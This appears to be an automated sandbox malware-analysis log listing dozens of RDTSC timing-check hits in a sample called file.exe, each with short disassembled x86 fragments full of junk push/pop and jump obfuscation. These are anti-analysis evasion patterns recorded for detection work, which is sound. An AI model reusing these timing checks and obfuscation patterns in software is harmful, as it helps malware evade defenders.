Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ED47 second address: B9ED6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d mov edi, dword ptr [ebp+122D21F2h] 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 pushad 0x00000017 jnp 00007F35AD0C7238h 0x0000001d pushad 0x0000001e popad 0x0000001f jng 00007F35AD0C723Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B862 second address: B9B866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B866 second address: B9B86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B86C second address: B9B891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B564h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c jnl 00007F35AD45B556h 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DDC8 second address: B9DDCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EEC5 second address: B9EECB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EECB second address: B9EEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD0C7247h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EEE6 second address: B9EFA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B55Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c call 00007F35AD45B569h 0x00000011 call 00007F35AD45B55Eh 0x00000016 adc ebx, 61D795F1h 0x0000001c pop edi 0x0000001d pop ebx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 pushad 0x00000026 clc 0x00000027 jnc 00007F35AD45B55Ch 0x0000002d popad 0x0000002e mov bh, 6Fh 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 add ebx, dword ptr [ebp+122D3548h] 0x0000003d mov eax, dword ptr [ebp+122D0829h] 0x00000043 jmp 00007F35AD45B561h 0x00000048 push FFFFFFFFh 0x0000004a jp 00007F35AD45B560h 0x00000050 jmp 00007F35AD45B55Ah 0x00000055 nop 0x00000056 jo 00007F35AD45B56Ch 0x0000005c jmp 00007F35AD45B566h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F35AD45B55Fh 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DEAE second address: B9DEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DEB2 second address: B9DEBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F35AD45B556h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DEBC second address: B9DECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9DECC second address: B9DED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2F8E second address: BA2F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2F92 second address: BA2F9C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F35AD45B556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2F9C second address: BA3032 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007F35AD0C7238h 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007F35AD0C723Ch 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F35AD0C7238h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F35AD0C7238h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 push 00000000h 0x00000052 mov ebx, dword ptr [ebp+122D3764h] 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a jmp 00007F35AD0C7240h 0x0000005f pop eax 0x00000060 push eax 0x00000061 push ecx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F35AD0C7242h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2073 second address: BA2078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2078 second address: BA2095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD0C7249h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2095 second address: BA20A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA51F9 second address: BA521B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007F35AD0C7236h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F35AD0C7240h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8328 second address: BA8350 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F35AD45B556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F35AD45B55Eh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F35AD45B55Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8350 second address: BA8354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8354 second address: BA83D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B55Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F35AD45B558h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D5449h], ebx 0x0000002a jmp 00007F35AD45B565h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 or dword ptr [ebp+122D2FE3h], edx 0x00000038 pop edi 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F35AD45B558h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 push eax 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA7477 second address: BA747B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA747B second address: BA7496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F35AD45B561h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA7555 second address: BA755F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F35AD0C7236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB213 second address: BAB220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA54B second address: BAA562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F35AD0C7236h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F35AD0C7238h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA562 second address: BAA567 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB35D second address: BAB363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAB363 second address: BAB367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE237 second address: BAE262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7245h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F35AD0C723Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE262 second address: BAE268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC241 second address: BAC245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE268 second address: BAE278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F35AD45B556h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC245 second address: BAC259 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F35AD0C7236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F35AD0C7236h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE278 second address: BAE27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE27D second address: BAE289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F35AD0C7236h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5220 second address: BB5247 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B562h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F35AD45B556h 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push edi 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5247 second address: BB5252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5252 second address: BB5258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5258 second address: BB525C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB486B second address: BB4875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F35AD45B556h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4875 second address: BB4885 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F35AD0C7236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4885 second address: BB48BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B569h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jnp 00007F35AD45B55Ch 0x00000011 jc 00007F35AD45B556h 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F35AD45B556h 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4BFD second address: BB4C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4D71 second address: BB4D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4D7B second address: BB4D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F35AD0C7236h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4D86 second address: BB4D8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBADDC second address: BBADE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB672 second address: BBB682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB682 second address: BBB696 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F35AD0C7236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB696 second address: BBB69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB69B second address: BBB6A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB6A0 second address: BBB6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC169D second address: BC16B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7241h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0DF5 second address: BC0DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0F4B second address: BC0F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0F51 second address: BC0F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F35AD45B556h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0F61 second address: BC0F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C723Ch 0x00000009 jmp 00007F35AD0C7241h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC10F5 second address: BC111A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F35AD45B55Dh 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ecx 0x0000000d push edx 0x0000000e je 00007F35AD45B556h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC111A second address: BC1132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7241h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC67F8 second address: BC680F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B55Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC680F second address: BC6815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5502 second address: BC5508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5508 second address: BC5511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5511 second address: BC5521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD45B55Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5521 second address: BC552A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5A90 second address: BC5A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F35AD45B55Ah 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5A9E second address: BC5AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5C40 second address: BC5C67 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 jmp 00007F35AD45B55Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F35AD45B55Fh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5C67 second address: BC5C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5C6D second address: BC5C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F35AD45B565h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5C8F second address: BC5C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5C93 second address: BC5C99 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5226 second address: BC5245 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F35AD0C723Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F35AD0C7236h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F35AD0C723Bh 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6571 second address: BC6576 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA9C7 second address: BCA9CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA9CB second address: BCA9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCADD5 second address: BCADE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F35AD0C7236h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCADE2 second address: BCADE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCAF23 second address: BCAF27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCAF27 second address: BCAF2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB30A second address: BCB311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB311 second address: BCB317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75E40 second address: B75E65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7249h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jg 00007F35AD0C7236h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51A4E second address: B51A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA23D second address: BCA241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA241 second address: BCA25D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B568h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA25D second address: BCA285 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F35AD0C7236h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F35AD0C7247h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA285 second address: BCA292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F35AD45B556h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
